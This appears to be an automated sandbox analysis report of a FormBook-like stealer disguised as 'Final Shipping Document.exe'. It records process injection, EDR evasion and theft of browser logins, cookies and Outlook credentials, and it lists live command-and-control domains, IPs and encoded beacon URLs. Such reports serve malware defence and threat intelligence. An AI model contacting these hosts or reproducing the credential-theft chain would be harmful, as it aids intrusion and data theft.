            Source: C:\Windows\SysWOW64\gpupdate.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\gpupdate.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\gpupdate.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\gpupdate.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\gpupdate.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\gpupdate.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\gpupdate.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: Final Shipping Document.exe Binary or memory string: WIN_81
            Source: Final Shipping Document.exe Binary or memory string: WIN_XP
            Source: Final Shipping Document.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: Final Shipping Document.exe Binary or memory string: WIN_XPe
            Source: Final Shipping Document.exe Binary or memory string: WIN_VISTA
            Source: Final Shipping Document.exe Binary or memory string: WIN_7
            Source: Final Shipping Document.exe Binary or memory string: WIN_8

            Remote Access Functionality

            Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000004.00000002.3890307016.0000000003470000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.3890277964.0000000004C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.3890392415.0000000004C70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.2370426785.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000007.00000002.3892567751.0000000005550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.2370049764.0000000003220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.3888449538.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.2369314894.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Final Shipping Document.exe Code function: 0_2_00C21204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 0_2_00C21204
            Source: C:\Users\user\Desktop\Final Shipping Document.exe Code function: 0_2_00C21806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00C21806
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 3 Obfuscated Files or Information | NTDS | 116 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 DLL Side-Loading | LSA Secrets | 241 Security Software Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 412 Process Injection | 2 Valid Accounts | Cached Domain Credentials | 12 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 412 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior Graph ID: 1483158
Sample: Final Shipping Document.exe
Startdate: 26/07/2024
Architecture: WINDOWS
Score: 100

Start
  -> www.pqnqxn.xyz
  -> www.gridban.xyz
  -> 15 other IPs or domains
  -> Malicious sample detected (through community Yara rule)
  -> Antivirus detection for URL or domain
  -> Multi AV Scanner detection for submitted file
  -> 7 other signatures
  -> Final Shipping Document.exe 4 (started)
www.gridban.xyz
  -> Performs DNS queries to domains with low reputation
Final Shipping Document.exe
  -> Binary is likely a compiled AutoIt script file
  -> Writes to foreign memory regions
  -> Maps a DLL or memory area into another process
  -> svchost.exe (started)
svchost.exe
  -> Maps a DLL or memory area into another process
  -> QnAcfZuONg.exe (injected)
QnAcfZuONg.exe (injected, edge from svchost.exe)
  -> Found direct / indirect Syscall (likely to bypass EDR)
  -> gpupdate.exe 13 (started)
gpupdate.exe
  -> Tries to steal Mail credentials (via file / registry access)
  -> Tries to harvest and steal browser information (history, passwords, etc)
  -> Modifies the context of a thread in another process (thread injection)
  -> 3 other signatures
  -> QnAcfZuONg.exe (injected)
  -> firefox.exe (started)
QnAcfZuONg.exe (injected, edge from gpupdate.exe)
  -> www.gridban.xyz 162.254.38.56, 55163, 55164, 55165 COGECO-PEER1CA United States
  -> www.pqnqxn.xyz 104.21.59.240, 55143, 55144, 55145 CLOUDFLARENETUS United States
  -> 6 other IPs or domains
  -> Found direct / indirect Syscall (likely to bypass EDR)

Source | Detection | Scanner | Label
Final Shipping Document.exe | 63% | ReversingLabs | Win32.Trojan.Strab
Final Shipping Document.exe | 100% | Joe Sandbox ML |
            No Antivirus matches
Source | Detection | Scanner | Label
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe
https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe
https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe
http://www.gridban.xyz/hheq/ | 0% | Avira URL Cloud | safe
http://www.artfulfusionhub.lat/qogc/?1Hg=gSefwjuKZsCuEGncBKSqgUjxJH+JcQqz+YMIzSjuOw+Y7MS0RxllxFRTV2Gn+zIiEtGaIum1DRHYZfVjpe+PZ37sYiWUr85MYTmGz//Zl0zNgUvOn9EXUqnEL5f2vZZjHw==&ejlto=QtkhctgpxJahPP0 | 0% | Avira URL Cloud | safe
http://www.xawcfzcql9tcvj.shop/jug9/ | 0% | Avira URL Cloud | safe
http://www.toppersbusiness.net/hugu/?ejlto=QtkhctgpxJahPP0&1Hg=vP/uG1dCvZ4PilGLFureb44eipjsuOvQXbL49xadF8bamHBm064La/heTQ4Pfno94C0sjxAGfQAAlyvLUXQlTtZB4zIUvEoM3zQ61bjQ13shwgtlO8h70X3QY/xUTFtAQA== | 0% | Avira URL Cloud | safe
http://www.xawcfzcql9tcvj.shop | 0% | Avira URL Cloud | safe
http://www.rajveena.online/wptv/ | 0% | Avira URL Cloud | safe
http://www.9muyiutyt.online/39t8/?ejlto=QtkhctgpxJahPP0&1Hg=89XVD+Uem60dZ1sDkhzA52EMF3du5QagyTQWgC74INncPQoYck8yZMKmhHYNHaZtvErKW4LDM1h+RSXnGPYlre6VurbK/jTyWP4vAbFcilh1x/G4ZSBU3Zl0LqnbfRVoCA== | 100% | Avira URL Cloud | malware
http://www.pqnqxn.xyz/fku9/ | 0% | Avira URL Cloud | safe
http://www.lovezi.shop/htli/?ejlto=QtkhctgpxJahPP0&1Hg=FjHjKNi/s/5kx+KnkSdD7DBcT3to66u90TWIQenAa0cXcBEeV9ZBFtbsq/uwbVXzm5/jkr9fdxMKasz/2IuVvEkWA5eWfr+6uK8ix+bvoaaPZEzC/cixV8fHHlKsAdCdfw== | 0% | Avira URL Cloud | safe
http://www.gridban.xyz/hheq/?1Hg=OQHjTIEzxI4+3uBJ4Ch4/gBE3u2u+7BoOuCOJurFjFRPYCarRFUfzgF9IWvn7XTpBRUAmOCVXs1kY9Zsut6EdHJsI9AJbTCs7iVD1ouYIWNqRmE7fP7CptgJfBKNW9KUkg==&ejlto=QtkhctgpxJahPP0 | 0% | Avira URL Cloud | safe
http://www.artfulfusionhub.lat/qogc/ | 0% | Avira URL Cloud | safe
http://www.lovezi.shop/htli/ | 0% | Avira URL Cloud | safe
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css | 0% | Avira URL Cloud | safe
https://artfulfusionhub.lat/qogc/?1Hg=gSefwjuKZsCuEGncBKSqgUjxJH | 0% | Avira URL Cloud | safe
https://www.9muyiutyt.online/39t8/?ejlto=QtkhctgpxJahPP0&1Hg=89XVD | 100% | Avira URL Cloud | malware
http://www.suntextmeetings.online/1wd4/ | 0% | Avira URL Cloud | safe
http://www.pqnqxn.xyz/fku9/?1Hg=8+E5hHkJAI9KLzdnRfLjsdta627301LWvCxQnfER7jE6HhXelR0L8M6eacA5uvGu6fFFzcUJZ3XtElIgDxgrCowK6qnc0dbjxbukcDgECY4ZLyFshyoZroDOS+2pE7Poig==&ejlto=QtkhctgpxJahPP0 | 0% | Avira URL Cloud | safe
http://www.rajveena.online/wptv/?1Hg=UBaSdI4L0SLSC905rDSQkq9H8MI7DUlv5ISEnSSRcSh4rK6z4u+7wt/PvR1ecI/XTQn9u86KuHymNqf2TqtSEsuZKbYYXqmtSyS/3vOPWUm+34EGC7zgpqm6nqQHfZAfNA==&ejlto=QtkhctgpxJahPP0 | 0% | Avira URL Cloud | safe
http://www.pqnqxn.xyz | 0% | Avira URL Cloud | safe
http://www.suntextmeetings.online/1wd4/?1Hg=ScHcXTKAO5eSE6uaWkYIjyQnfQ68P9tZ9TtcMsVrul6RoGZN9pvJIdRIgUxQy3rdaSGeQ+CIaUiYSa72rbvJ1wEunXVWpcUP89m8x1dRGPimMbT7bK/R3/HUlg93LDGrxg==&ejlto=QtkhctgpxJahPP0 | 0% | Avira URL Cloud | safe
http://www.9muyiutyt.online/39t8/ | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
suntextmeetings.online | 148.66.138.133 | true | false | | unknown
www.pqnqxn.xyz | 104.21.59.240 | true | true | | unknown
www.artfulfusionhub.lat | 188.114.96.3 | true | false | | unknown
8fyhback.javalebogame008.com | 154.218.3.243 | true | false | | unknown
toppersbusiness.net | 178.212.35.248 | true | false | | unknown
www.gridban.xyz | 162.254.38.56 | true | true | | unknown
rajveena.online | 84.32.84.32 | true | false | | unknown
lovezi.shop | 84.32.84.32 | true | false | | unknown
xawcfzcql9tcvj.shop | 142.171.29.133 | true | false | | unknown
www.76716e97778bac2e.com | unknown | unknown | true | | unknown
www.rajveena.online | unknown | unknown | true | | unknown
www.9muyiutyt.online | unknown | unknown | true | | unknown
www.toppersbusiness.net | unknown | unknown | true | | unknown
www.suntextmeetings.online | unknown | unknown | true | | unknown
www.lovezi.shop | unknown | unknown | true | | unknown
www.xawcfzcql9tcvj.shop | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.gridban.xyz/hheq/ | false | Avira URL Cloud: safe | unknown
http://www.artfulfusionhub.lat/qogc/?1Hg=gSefwjuKZsCuEGncBKSqgUjxJH+JcQqz+YMIzSjuOw+Y7MS0RxllxFRTV2Gn+zIiEtGaIum1DRHYZfVjpe+PZ37sYiWUr85MYTmGz//Zl0zNgUvOn9EXUqnEL5f2vZZjHw==&ejlto=QtkhctgpxJahPP0 | false | Avira URL Cloud: safe | unknown
http://www.9muyiutyt.online/39t8/?ejlto=QtkhctgpxJahPP0&1Hg=89XVD+Uem60dZ1sDkhzA52EMF3du5QagyTQWgC74INncPQoYck8yZMKmhHYNHaZtvErKW4LDM1h+RSXnGPYlre6VurbK/jTyWP4vAbFcilh1x/G4ZSBU3Zl0LqnbfRVoCA== | false | Avira URL Cloud: malware | unknown
http://www.xawcfzcql9tcvj.shop/jug9/ | false | Avira URL Cloud: safe | unknown
http://www.toppersbusiness.net/hugu/?ejlto=QtkhctgpxJahPP0&1Hg=vP/uG1dCvZ4PilGLFureb44eipjsuOvQXbL49xadF8bamHBm064La/heTQ4Pfno94C0sjxAGfQAAlyvLUXQlTtZB4zIUvEoM3zQ61bjQ13shwgtlO8h70X3QY/xUTFtAQA== | false | Avira URL Cloud: safe | unknown
http://www.gridban.xyz/hheq/?1Hg=OQHjTIEzxI4+3uBJ4Ch4/gBE3u2u+7BoOuCOJurFjFRPYCarRFUfzgF9IWvn7XTpBRUAmOCVXs1kY9Zsut6EdHJsI9AJbTCs7iVD1ouYIWNqRmE7fP7CptgJfBKNW9KUkg==&ejlto=QtkhctgpxJahPP0 | false | Avira URL Cloud: safe | unknown
http://www.rajveena.online/wptv/ | false | Avira URL Cloud: safe | unknown
http://www.lovezi.shop/htli/?ejlto=QtkhctgpxJahPP0&1Hg=FjHjKNi/s/5kx+KnkSdD7DBcT3to66u90TWIQenAa0cXcBEeV9ZBFtbsq/uwbVXzm5/jkr9fdxMKasz/2IuVvEkWA5eWfr+6uK8ix+bvoaaPZEzC/cixV8fHHlKsAdCdfw== | false | Avira URL Cloud: safe | unknown
http://www.artfulfusionhub.lat/qogc/ | false | Avira URL Cloud: safe | unknown
http://www.pqnqxn.xyz/fku9/ | false | Avira URL Cloud: safe | unknown
http://www.suntextmeetings.online/1wd4/ | false | Avira URL Cloud: safe | unknown
http://www.lovezi.shop/htli/ | false | Avira URL Cloud: safe | unknown
http://www.rajveena.online/wptv/?1Hg=UBaSdI4L0SLSC905rDSQkq9H8MI7DUlv5ISEnSSRcSh4rK6z4u+7wt/PvR1ecI/XTQn9u86KuHymNqf2TqtSEsuZKbYYXqmtSyS/3vOPWUm+34EGC7zgpqm6nqQHfZAfNA==&ejlto=QtkhctgpxJahPP0 | false | Avira URL Cloud: safe | unknown
http://www.9muyiutyt.online/39t8/ | false | Avira URL Cloud: malware | unknown
http://www.suntextmeetings.online/1wd4/?1Hg=ScHcXTKAO5eSE6uaWkYIjyQnfQ68P9tZ9TtcMsVrul6RoGZN9pvJIdRIgUxQy3rdaSGeQ+CIaUiYSa72rbvJ1wEunXVWpcUP89m8x1dRGPimMbT7bK/R3/HUlg93LDGrxg==&ejlto=QtkhctgpxJahPP0 | false | Avira URL Cloud: safe | unknown
http://www.pqnqxn.xyz/fku9/?1Hg=8+E5hHkJAI9KLzdnRfLjsdta627301LWvCxQnfER7jE6HhXelR0L8M6eacA5uvGu6fFFzcUJZ3XtElIgDxgrCowK6qnc0dbjxbukcDgECY4ZLyFshyoZroDOS+2pE7Poig==&ejlto=QtkhctgpxJahPP0 | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.xawcfzcql9tcvj.shop | QnAcfZuONg.exe, 00000007.00000002.3892567751.00000000055B4000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/chrome_newtab | gpupdate.exe, 00000005.00000003.2665197301.00000000081BD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | gpupdate.exe, 00000005.00000003.2665197301.00000000081BD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | gpupdate.exe, 00000005.00000003.2665197301.00000000081BD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | gpupdate.exe, 00000005.00000003.2665197301.00000000081BD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | gpupdate.exe, 00000005.00000003.2665197301.00000000081BD000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.ecosia.org/newtab/ | gpupdate.exe, 00000005.00000003.2665197301.00000000081BD000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ac.ecosia.org/autocomplete?q= | gpupdate.exe, 00000005.00000003.2665197301.00000000081BD000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.9muyiutyt.online/39t8/?ejlto=QtkhctgpxJahPP0&1Hg=89XVD | gpupdate.exe, 00000005.00000002.3891568008.0000000006210000.00000004.10000000.00040000.00000000.sdmp, QnAcfZuONg.exe, 00000007.00000002.3890876072.0000000003E70000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://artfulfusionhub.lat/qogc/?1Hg=gSefwjuKZsCuEGncBKSqgUjxJH | gpupdate.exe, 00000005.00000002.3891568008.000000000607E000.00000004.10000000.00040000.00000000.sdmp, QnAcfZuONg.exe, 00000007.00000002.3890876072.0000000003CDE000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | gpupdate.exe, 00000005.00000003.2665197301.00000000081BD000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css | gpupdate.exe, 00000005.00000002.3891568008.0000000006534000.00000004.10000000.00040000.00000000.sdmp, QnAcfZuONg.exe, 00000007.00000002.3890876072.0000000004194000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.pqnqxn.xyz | gpupdate.exe, 00000005.00000002.3891568008.0000000005D5A000.00000004.10000000.00040000.00000000.sdmp, QnAcfZuONg.exe, 00000007.00000002.3890876072.00000000039BA000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | gpupdate.exe, 00000005.00000003.2665197301.00000000081BD000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
178.212.35.248 | toppersbusiness.net | Germany | 35913 | DEDIPATH-LLCUS | false
104.21.59.240 | www.pqnqxn.xyz | United States | 13335 | CLOUDFLARENETUS | true
188.114.96.3 | www.artfulfusionhub.lat | European Union | 13335 | CLOUDFLARENETUS | false
84.32.84.32 | rajveena.online | Lithuania | 33922 | NTT-LT-ASLT | false
154.218.3.243 | 8fyhback.javalebogame008.com | Seychelles | 138995 | BILLY-AS-APAntboxNetworkCN | false
142.171.29.133 | xawcfzcql9tcvj.shop | Canada | 7122 | MTS-ASNCA | false
162.254.38.56 | www.gridban.xyz | United States | 13768 | COGECO-PEER1CA | true
148.66.138.133 | suntextmeetings.online | Singapore | 26496 | AS-26496-GO-DADDY-COM-LLCUS | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1483158
Start date and time: 2024-07-26 18:44:03 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 24s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Final Shipping Document.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/5@13/8
                                            EGA Information:
                                            • Successful, ratio: 75%
                                            HCA Information:
                                            • Successful, ratio: 99%
                                            • Number of executed functions: 52
                                            • Number of non-executed functions: 290
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target QnAcfZuONg.exe, PID 7100 because it is empty
                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                            • VT rate limit hit for: Final Shipping Document.exe
Time | Type | Description
12:46:12 | API Interceptor | 6480039x Sleep call for process: gpupdate.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
178.212.35.248 | New Order#9.exe | malicious | FormBook |
 | PO#O_0140724.exe | malicious | FormBook |
 | OaHosly9lyzkZ0G.exe | malicious | FormBook, PureLog Stealer |
 | afn6Od8oV1sUzD6.exe | malicious | FormBook |
 | HSOwUsZ7hs6Pm4m.exe | malicious | FormBook |
 | j2vPH4wfF2YxEja.exe | malicious | FormBook |
 | DY3AojqquRfcmp5.exe | malicious | FormBook |
104.21.59.240 | PO#O_0140724.exe | malicious | FormBook | www.pqnqxn.xyz/fku9/
 | OaHosly9lyzkZ0G.exe | malicious | FormBook, PureLog Stealer | www.pqnqxn.xyz/fku9/
 | afn6Od8oV1sUzD6.exe | malicious | FormBook | www.pqnqxn.xyz/fku9/
 | j2vPH4wfF2YxEja.exe | malicious | FormBook | www.pqnqxn.xyz/fku9/
 | DY3AojqquRfcmp5.exe | malicious | FormBook | www.pqnqxn.xyz/fku9/
188.114.96.3 | RFQ#51281AOLAI.xls | malicious | FormBook, PureLog Stealer | tny.wtf/
 | DHL Shipment Notification 490104998009.xls | malicious | Remcos | tny.wtf/dg4Zx
 | Purchase Inquiry.xla.xlsx | malicious | Remcos | tny.wtf/c8lH8
 | AWD 490104998518.xls | malicious | Remcos | tny.wtf/sA
 | waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xls | malicious | GuLoader, Remcos | hq.ax/Oi8
 | RFQ#51281AOLAI.xls | malicious | FormBook, PureLog Stealer | tny.wtf/dGa
 | RFQ#51281AOLAI.xls | malicious | FormBook, PureLog Stealer | tny.wtf/
 | Quotation.xls | malicious | Remcos | tny.wtf/jjJsPX
 | xptRc4P9NV.exe | malicious | Unknown | api.keyunet.cn/v3/Project/appInfo/65fc6006
 | LisectAVT_2403002B_448.exe | malicious | FormBook, PureLog Stealer | www.universitetrading.com/hfhf/?6lBX5p6=0/2bsV2tZWehMRII3oIkv/ztWj8eLfm1RPHJ5DhA9wGKWMCN0u1aqYIHkCdH1AqUUdYe&Kjsl=FbuD_t_HwtJdin
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.gridban.xyz | New Order#9.exe | malicious | FormBook | 162.254.38.56
www.pqnqxn.xyz | New Order#9.exe | malicious | FormBook | 172.67.185.114
 | PO#O_0140724.exe | malicious | FormBook | 104.21.59.240
 | DOC 0201_360737031.exe | malicious | FormBook | 104.21.59.240
 | Remittance advice.exe | malicious | FormBook, PureLog Stealer | 172.67.185.114
 | INV90097.exe | malicious | FormBook | 172.67.185.114
 | OaHosly9lyzkZ0G.exe | malicious | FormBook, PureLog Stealer | 104.21.59.240
 | afn6Od8oV1sUzD6.exe | malicious | FormBook | 104.21.59.240
 | HSOwUsZ7hs6Pm4m.exe | malicious | FormBook | 172.67.185.114
 | j2vPH4wfF2YxEja.exe | malicious | FormBook | 104.21.59.240
 | DY3AojqquRfcmp5.exe | malicious | FormBook | 104.21.59.240
8fyhback.javalebogame008.com | New Order#9.exe | malicious | FormBook | 154.218.3.243
 | Eugg3yid0O.exe | malicious | FormBook | 45.207.4.217
www.artfulfusionhub.lat | HSOwUsZ7hs6Pm4m.exe | malicious | FormBook | 188.114.97.3
 | j2vPH4wfF2YxEja.exe | malicious | FormBook | 188.114.97.3
 | DY3AojqquRfcmp5.exe | malicious | FormBook | 188.114.96.3
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          NTT-LT-ASLTNew Order#9.exeGet hashmaliciousFormBookBrowse
                                                          • 84.32.84.32
                                                          https://olive-hummingbird-763499.hostingersite.com/Onedrive-inboxmessage/onenote.html#asa@aan.ptGet hashmaliciousUnknownBrowse
                                                          • 84.32.84.19
                                                          OPEN BALANCE.exeGet hashmaliciousFormBookBrowse
                                                          • 84.32.84.65
                                                          COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                          • 84.32.84.32
                                                          https://olive-hummingbird-763499.hostingersite.com/Onedrive-inboxmessage/onenote.html%23e.szejgis@arlen.com.pl&c=E%2C10%2CGElLHQ3V9C4dUNBFMZt1mVRH2LpMhvMQrmpyxCta58errD7FQTDbxAt4Y5cCMR6WJVxZVMHk4h8%2BUN47&typo=1&know=0Get hashmaliciousUnknownBrowse
                                                          • 84.32.84.212
                                                          http://www.cabrerallamas.com/Get hashmaliciousUnknownBrowse
                                                          • 84.32.84.136
                                                          LisectAVT_2403002B_448.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 84.32.84.225
                                                          LisectAVT_2403002C_3.exeGet hashmaliciousFormBookBrowse
                                                          • 84.32.84.102
                                                          PO#O_0140724.exeGet hashmaliciousFormBookBrowse
                                                          • 84.32.84.32
                                                          kJs0JTLO6I.exeGet hashmaliciousMetasploitBrowse
                                                          • 84.32.84.139
                                                          CLOUDFLARENETUShttps://forms.office.com/r/qq9c20HBqaGet hashmaliciousTycoon2FABrowse
                                                          • 104.17.25.14
